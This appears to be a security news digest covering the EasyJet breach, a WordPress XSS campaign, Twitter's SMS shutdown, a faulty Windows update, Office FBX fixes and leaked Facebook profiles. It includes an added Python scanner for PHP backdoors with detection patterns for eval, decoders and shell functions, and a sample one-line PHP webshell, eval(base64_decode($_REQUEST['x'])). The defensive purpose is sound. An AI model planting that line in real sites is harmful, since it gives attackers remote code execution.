EasyJet, the UK’s largest airline, has disclosed that they were hacked and that the email addresses and travel information for 9 million customers were exposed. For some of these customers, credit card details were also accessed by the attackers.
In a data breach notification disclosed today, EasyJet states that they have suffered a cyberattack, and an unauthorized third-party was able to gain access to their systems.
During this attack, the threat actors were able to access the email addresses and travel information for nine million customers. For approximately 2,208 customers, credit card details were also exposed.
Hackers have launched a massive attack against more than 900,000 WordPress sites seeking to redirect visitors to malvertising sites or plant a backdoor if an administrator is logged in.
Based on the payload, the attacks seem to be the work of a single threat actor, who used at least 24,000 IP addresses over the past month to send malicious requests to more than 900,000 sites.
XSS, malvertising, backdoor
Compromise attempts increased after April 28. WordPress security company Defiant, makers of the Wordfence security plugin, detected on May 3 over 20 million attacks against more than half a million websites.
Ram Gall, senior QA at Defiant, said that the attackers focused mostly on exploiting cross-site scripting (XSS) vulnerabilities in plugins that received a fix months or years ago and had been targeted in other attacks.
If an administrator is logged in, the injected script plants a backdoor that fetches a further payload and writes it into the theme's header file, where it is executed whenever the site is loaded. "This method would allow the attacker to maintain control of the site," Gall explains.
This way, the attacker could later switch to a different payload: a webshell, code that creates a malicious admin user, or code that wipes the site's content. In the report today, Defiant included indicators of compromise for the final payload.
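As an added example (not code from Defiant's report or from the original article), the following scanner checks the theme files an attacker would most likely write to (header.php, footer.php, functions.php) for heuristic signs of a dropped PHP backdoor. The indicator list, the file list and the two sample headers are constructed assumptions for illustration; they are not the indicators of compromise Defiant published, so real findings still need manual review.

```python
"""Heuristic scan of WordPress theme files for an injected PHP backdoor.

Added example; the patterns below are assumptions, not Defiant's IOC set.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Heuristic indicators of a PHP backdoor appended to a theme template.
# Assumed for illustration; ordinary themes rarely need any of these.
INDICATORS = [
    (re.compile(r"\beval\s*\(", re.I), "eval() call"),
    (re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "decoder used for obfuscated payload"),
    (re.compile(r"\b(system|passthru|shell_exec|popen|proc_open)\s*\(", re.I),
     "shell execution function"),
    (re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
     "fetch of a remote URL (next-stage download)"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[", re.I),
     "request parameter read inside a theme template"),
]

# Theme files a backdoor is typically written into (assumption).
TARGET_FILES = ("header.php", "footer.php", "functions.php")


def scan_php(source: str) -> list[str]:
    """Return the indicator descriptions matched in one PHP source file."""
    return [label for pattern, label in INDICATORS if pattern.search(source)]


def scan_themes(themes_root: Path) -> dict[str, list[str]]:
    """Scan every theme under wp-content/themes; map relative path to findings."""
    results: dict[str, list[str]] = {}
    for name in TARGET_FILES:
        for path in sorted(themes_root.glob(f"*/{name}")):
            findings = scan_php(path.read_text(encoding="utf-8", errors="replace"))
            if findings:
                results[str(path.relative_to(themes_root))] = findings
    return results


# Constructed sample: an ordinary theme header with nothing suspicious.
CLEAN_HEADER = """<?php
/* constructed sample: an ordinary theme header */
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<?php wp_head(); ?>
</head>
<body <?php body_class(); ?>>
"""

# Constructed sample: the same header with a one-line backdoor prepended.
# The payload is illustrative, not the code used in the campaign.
INFECTED_HEADER = CLEAN_HEADER.replace(
    "<?php\n",
    "<?php if(isset($_REQUEST['x'])){eval(base64_decode($_REQUEST['x']));}\n",
    1,
)


def demo() -> dict[str, list[str]]:
    """Write both samples into a temporary themes tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        themes = Path(tmp) / "wp-content" / "themes"
        (themes / "cleantheme").mkdir(parents=True)
        (themes / "badtheme").mkdir(parents=True)
        (themes / "cleantheme" / "header.php").write_text(CLEAN_HEADER, encoding="utf-8")
        (themes / "badtheme" / "header.php").write_text(INFECTED_HEADER, encoding="utf-8")
        return scan_themes(themes)


if __name__ == "__main__":
    for rel_path, findings in demo().items():
        print(rel_path)
        for finding in findings:
            print("  -", finding)
```

Point `scan_themes` at a real `wp-content/themes` directory to use it on a site; the clean sample produces no findings, while the infected one is flagged for the eval call, the base64 decoder and the request-parameter read. A match on a single indicator (for example a theme that legitimately reads `$_GET`) is a prompt to inspect the file, not proof of compromise.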
Twitter announced today that it has turned off the Twitter via SMS service because of security concerns. The service had allowed users to tweet by text message since the social network's early days.
“We want to continue to help keep your account safe,” the company’s support account tweeted earlier today.
“We’ve seen vulnerabilities with SMS, so we’ve turned off our Twitter via SMS service, except for a few countries.”
However, as the company added, Twitter users will still be able to use "important SMS messages" to log in to the platform and to manage their accounts.
Microsoft is investigating Bluetooth issues, failures to install, and blue screen reports received from users who have installed or attempted to install the KB4549951 cumulative update released during this month’s Patch Tuesday.
KB4549951 provides customers with security fixes for devices running Windows 10, version 1909, and Windows 10, version 1903, and it can be installed automatically by checking for updates via Windows Update or manually from the Microsoft Update Catalog.
Windows admins can also distribute the update to users via Windows Server Update Services (WSUS). Customers who have automatic updates enabled don’t need to take any further actions.
As we reported last week, users are reporting a wide assortment of issues when installing and after deploying KB4549951, including blue screens of death (BSODs), failures to install, networking issues, display issues, and system freezes when trying to use streaming services.
Others say that their Windows 10 installation is completely broken, with their devices no longer able to boot after installing the KB4549951 update.
Microsoft has released an out-of-band security update that fixes remote code execution vulnerabilities in an Autodesk FBX library integrated into Microsoft Office and Paint 3D applications.
Last month, Autodesk issued security updates for its Autodesk FBX Software Development Kit that resolve remote code execution and denial of service vulnerabilities triggered by specially crafted FBX files.
An FBX file is an Autodesk file format that is used to store 3D models, assets, shapes, and animations.
To exploit these vulnerabilities, an attacker would create a malicious FBX file that would exploit “buffer overflow, type confusion, use-after-free, integer overflow, NULL pointer dereference, and heap overflow vulnerabilities” to perform a DoS attack or remotely execute code.
Microsoft Office uses the Autodesk FBX library
As Microsoft Office 2016, Microsoft Office 2019, Office 365, and Paint 3D utilize the Autodesk FBX library, Microsoft today released new security updates that resolve these remote code execution and DoS vulnerabilities in its products.
In an advisory titled “ADV200004 | Availability of updates for Microsoft software utilizing the Autodesk FBX library”, Microsoft explains that opening malicious FBX files in Office applications could lead to remote code execution.
Threat actors are selling over 267 million Facebook profiles for £500 ($623) on dark web sites and hacker forums. While none of these records include passwords, they do contain information that could allow attackers to perform spear phishing or SMS attacks to steal credentials.
Last month, security researcher Bob Diachenko discovered an open Elasticsearch database that contained a little over 267 million Facebook records, with most being users from the United States.
For many of these records, they contained a user’s full name, their phone number, and a unique Facebook ID.
The ISP hosting the database eventually took the server offline after being contacted by Diachenko.
Soon after, a second server containing the same data plus an additional 42 million records was brought online, but it was quickly attacked by unknown threat actors who left a message telling the owners to secure their servers.
Of this new data, 16.8 million records included more information such as a Facebook user’s email address, birth date, and gender.
It was never determined who these servers belonged to, but Diachenko believed they were owned by a criminal organization that had collected the data either through the Facebook API before access was locked down or by scraping public profiles.